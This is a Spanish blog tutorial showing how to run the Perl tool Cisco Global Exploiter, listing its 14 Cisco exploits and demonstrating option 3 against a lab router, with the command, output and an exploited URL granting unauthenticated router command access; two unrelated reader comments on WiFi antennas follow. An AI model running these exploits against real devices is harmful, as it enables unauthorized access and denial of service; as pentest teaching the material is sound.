Cisco Global Exploiter
Cisco Global Exploiter (CGE) es un pequeño script hecho en Perl que combina 14 vulnerabilidades individuales que pueden ser contrastadas con los dispositivos Cisco. Es importante señalar que estas vulnerabilidades representan a sólo un conjunto especÃfico de los equipos Cisco y esta pequeña herramienta no está completamente diseñada para realizar una evaluación de todas las necesidades de seguridad de estos equipos.
Para abrir Cisco Global Exploiter lo podemos hacer desde la terminal.
cd /pentest/cisco/cisco-global-exploiter/Para abrir Cisco Global Exploiter lo podemos hacer desde la terminal.
./cge.pl
Usage :
perl cge.pl
Vulnerabilities list :
[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability
[2] - Cisco IOS Router Denial of Service Vulnerability
[3] - Cisco IOS HTTP Auth Vulnerability
[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
[6] - Cisco 675 Web Administration Denial of Service Vulnerability
[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability
[9] - Cisco 514 UDP Flood Denial of Service Vulnerability
[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
[11] - Cisco Catalyst Memory Leak Vulnerability
[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
[13] - 0 Encoding IDS Bypass Vulnerability (UTF)
[14] - Cisco IOS HTTP Denial of Service Vulnerability
root@delfi:/pentest/cisco/cisco-global-exploiter#
Opciones Cisco Global Exploiter.
En la imagen anterior se muestran las opciones y las instrucciones de uso de esta mini herramienta, también muestra una lista de 14 vulnerabilidades en un orden definido. De la lista de vulnerabilidades tomaremos un ejemplo para realizar una prueba contra un equipos cisco modelo 2600, asà que lanzamos la prueba desde consola con el siguiente comando.
root@delfi:/pentest/cisco/cisco-global-exploiter# ./cge.pl 192.168.1.75 3
Vulnerability unsuccessful exploited ...
Vulnerability successful exploited with [http://192.168.1.75/level/18/exec/....]
Vulnerability Successful Exploited.
En este caso, la prueba se ha realizado utilizando la opción [3] - Cisco IOS HTTP Auth Vulnerability y como podemos ver la vulnerabilidad ha sido explotada con éxito.
Acceso al Router 2600 de nombre R2_WAN.
Ahora desde el explorador podemos ejecutar comandos del router sin ningún tipo de autenticación.
2 comentarios
Hola amigo Delfi, como estas, yo usando a full la magnifica Awus. Por fin pude ver un programa de tv en la pc sin que haya cortes. No tenia idea que la antena que trae este adaptador (la de 5dbi) se puede apuntar a determinada zona para obtener mejores ganancias. O sea que no estaba comprendiendo correctamente el termino omnidireccional . Pense que al dirigirse en forma uniforme hacia lo que lo rodea, apuntar para algun lado no modificaba en nada la manera de recibir las señales. Te pasa lo mismo con respecto a la direccion que le das a la antena? Un abrazo
ResponderEliminarHola Jeremias.
ResponderEliminarPues veras, si que modifica la manera de recibir la señal y me ha pasado lo mismo, tambien dependiendo del entorno puede que recibas una mejor señal o lo contrario, por ejemplo en una ciudad y luego en una zona rural son entornos completamentes diferentes, en la ciudad todo llega a todos sitios, la señal rebota y todo hace ruido :) si no recibes bien en un cuarto puedes moverte a otra ubicacion y mover la antena en planos horizontales y verticales hasta conseguÃr una mejor señal, y de hecho, hasta ahora no he tenido una omni mejor que la del alfa, recibe muy bien, sobre todo en interiores. Lo digo porque lo compare con la antena de 10dbi que trae el Kasens G5000 y no vi mucha diferencia, aunque la antena de la Kasens es una mega-antena pero creo que es de las peores, nada que ver con su tamaño, es muy mala antena. Saludos.